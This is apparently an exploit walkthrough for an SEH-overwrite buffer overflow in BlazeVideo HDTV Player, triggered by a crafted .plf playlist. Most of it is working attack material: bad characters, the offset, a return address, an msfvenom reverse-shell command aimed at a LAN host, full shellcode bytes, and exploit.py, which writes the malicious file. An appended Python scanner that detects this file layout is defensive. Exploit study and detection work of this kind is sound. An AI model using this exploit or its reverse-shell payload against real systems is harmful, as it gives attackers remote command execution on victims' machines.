BlazeVideo HDTV Player Standard - '.plf' File Remote Buffer Overflow Walkthrough

reference BlazeVideo HDTV Player Standard - '.plf' File Remote Buffer Overflow
os name Microsoft Windows 7 Professional
os version 6.1.7601 Service Pack 1 Build 7601
system type x86-based PC

The original exploit is for BlazeVideo HDTV Player Standard 6.6.0.20.
But this post will focus on BlazeVideo HDTV Player Professional 6.6.0.4.

Administrator privileges are required to run the program by default.

badchar

(process omitted)
\x00\x0a\x1a\x2f\x3a\x5c

\x2f = /
\x3a = :
\x5c = \

offset

(process omitted)
872

return address

seh

(process omitted)
DTVDeviceMaganer.dll 0x61306e71

shellcode

The PLS format is an INI-like format, so the payload does not need an http:// prefix in front of it.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.89 LPORT=443  -f python  -v shellcode  -b "\x00\x0a\x1a\x2f\x3a\x5c"

exploit.py

shellcode =  b""
shellcode += b"\xbd\x2b\x0b\xf6\xea\xda\xd2\xd9\x74\x24\xf4"
shellcode += b"\x58\x29\xc9\xb1\x52\x31\x68\x12\x03\x68\x12"
shellcode += b"\x83\xc3\xf7\x14\x1f\xef\xe0\x5b\xe0\x0f\xf1"
shellcode += b"\x3b\x68\xea\xc0\x7b\x0e\x7f\x72\x4c\x44\x2d"
shellcode += b"\x7f\x27\x08\xc5\xf4\x45\x85\xea\xbd\xe0\xf3"
shellcode += b"\xc5\x3e\x58\xc7\x44\xbd\xa3\x14\xa6\xfc\x6b"
shellcode += b"\x69\xa7\x39\x91\x80\xf5\x92\xdd\x37\xe9\x97"
shellcode += b"\xa8\x8b\x82\xe4\x3d\x8c\x77\xbc\x3c\xbd\x26"
shellcode += b"\xb6\x66\x1d\xc9\x1b\x13\x14\xd1\x78\x1e\xee"
shellcode += b"\x6a\x4a\xd4\xf1\xba\x82\x15\x5d\x83\x2a\xe4"
shellcode += b"\x9f\xc4\x8d\x17\xea\x3c\xee\xaa\xed\xfb\x8c"
shellcode += b"\x70\x7b\x1f\x36\xf2\xdb\xfb\xc6\xd7\xba\x88"
shellcode += b"\xc5\x9c\xc9\xd6\xc9\x23\x1d\x6d\xf5\xa8\xa0"
shellcode += b"\xa1\x7f\xea\x86\x65\xdb\xa8\xa7\x3c\x81\x1f"
shellcode += b"\xd7\x5e\x6a\xff\x7d\x15\x87\x14\x0c\x74\xc0"
shellcode += b"\xd9\x3d\x86\x10\x76\x35\xf5\x22\xd9\xed\x91"
shellcode += b"\x0e\x92\x2b\x66\x70\x89\x8c\xf8\x8f\x32\xed"
shellcode += b"\xd1\x4b\x66\xbd\x49\x7d\x07\x56\x89\x82\xd2"
shellcode += b"\xf9\xd9\x2c\x8d\xb9\x89\x8c\x7d\x52\xc3\x02"
shellcode += b"\xa1\x42\xec\xc8\xca\xe9\x17\x9b\x34\x45\x16"
shellcode += b"\x02\xdd\x94\x18\xb5\xa6\x10\xfe\xdf\xc8\x74"
shellcode += b"\xa9\x77\x70\xdd\x21\xe9\x7d\xcb\x4c\x29\xf5"
shellcode += b"\xf8\xb1\xe4\xfe\x75\xa1\x91\x0e\xc0\x9b\x34"
shellcode += b"\x10\xfe\xb3\xdb\x83\x65\x43\x95\xbf\x31\x14"
shellcode += b"\xf2\x0e\x48\xf0\xee\x29\xe2\xe6\xf2\xac\xcd"
shellcode += b"\xa2\x28\x0d\xd3\x2b\xbc\x29\xf7\x3b\x78\xb1"
shellcode += b"\xb3\x6f\xd4\xe4\x6d\xd9\x92\x5e\xdc\xb3\x4c"
shellcode += b"\x0c\xb6\x53\x08\x7e\x09\x25\x15\xab\xff\xc9"
shellcode += b"\xa4\x02\x46\xf6\x09\xc3\x4e\x8f\x77\x73\xb0"
shellcode += b"\x5a\x3c\x83\xfb\xc6\x15\x0c\xa2\x93\x27\x51"
shellcode += b"\x55\x4e\x6b\x6c\xd6\x7a\x14\x8b\xc6\x0f\x11"
shellcode += b"\xd7\x40\xfc\x6b\x48\x25\x02\xdf\x69\x6c"

payload = b"A" * (872 - 4)               # padding up to the nSEH record
payload += b"\xeb\x06\x41\x41"           # nSEH: short jump 6 bytes forward, over the SEH slot
payload += b"\x71\x6e\x30\x61"           # SEH: 0x61306e71 (DTVDeviceMaganer.dll), little-endian
payload += b"\x90" * 16                  # NOP sled
payload += shellcode                     # shellcode is bytes, so payload must be bytes too
payload += b"C" * (5000 - len(payload))  # filler up to 5000 bytes

with open("exploit.plf", "wb") as fp:    # binary mode so bytes above 0x7f are written unchanged
    fp.write(payload)
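As an added example that is not part of the original walkthrough, a small Python scanner that flags a playlist file laid out like the one above: an overlong entry, non-printable bytes, and the nSEH short jump followed by the handler address. The 512-byte threshold, the function name and the two sample files are assumptions.

```python
# Added example (not part of the original walkthrough): scan a .plf/.pls playlist
# for the SEH-overwrite layout described above. Threshold, names and samples are
# assumptions drawn from the walkthrough, not from the player or the exploit.
from typing import Dict, List

# Assumption: the overflow offset is 872 bytes and no legitimate playlist entry
# (a file path or URL) comes anywhere near that length.
MAX_LINE_LENGTH = 512

# nSEH short jump over the handler slot followed by the handler address
# (0x61306e71 in DTVDeviceMaganer.dll, little-endian), as laid out in exploit.py.
SEH_SIGNATURE = b"\xeb\x06\x41\x41\x71\x6e\x30\x61"


def scan_playlist(data: bytes) -> List[Dict[str, object]]:
    """Return one finding per suspicious line in the playlist bytes."""
    findings = []
    for lineno, line in enumerate(data.split(b"\n"), start=1):
        line = line.rstrip(b"\r")
        reasons = []
        if len(line) > MAX_LINE_LENGTH:
            reasons.append(f"line length {len(line)} exceeds {MAX_LINE_LENGTH}")
        # Playlist entries are text; bytes outside printable ASCII (tab allowed) are a red flag.
        if any((b < 0x20 and b != 0x09) or b >= 0x7f for b in line):
            reasons.append("non-printable bytes present")
        if SEH_SIGNATURE in line:
            reasons.append("nSEH/SEH overwrite pattern found")
        if reasons:
            findings.append({"line": lineno, "length": len(line), "reasons": reasons})
    return findings


# Constructed samples: a benign PLS-style playlist, and a file laid out like the
# exploit above (padding, nSEH jump, SEH address, NOP sled, filler) with no shellcode.
BENIGN_PLF = b"[playlist]\r\nFile1=C:\\Videos\\show.ts\r\nTitle1=Show\r\nNumberOfEntries=1\r\n"
CRAFTED_PLF = b"A" * (872 - 4) + SEH_SIGNATURE + b"\x90" * 16 + b"C" * 100

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_PLF), ("crafted", CRAFTED_PLF)):
        for f in scan_playlist(sample):
            print(f"{name}: line {f['line']} ({f['length']} bytes): {', '.join(f['reasons'])}")
```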

proof

Folder icon -> Open Playlist...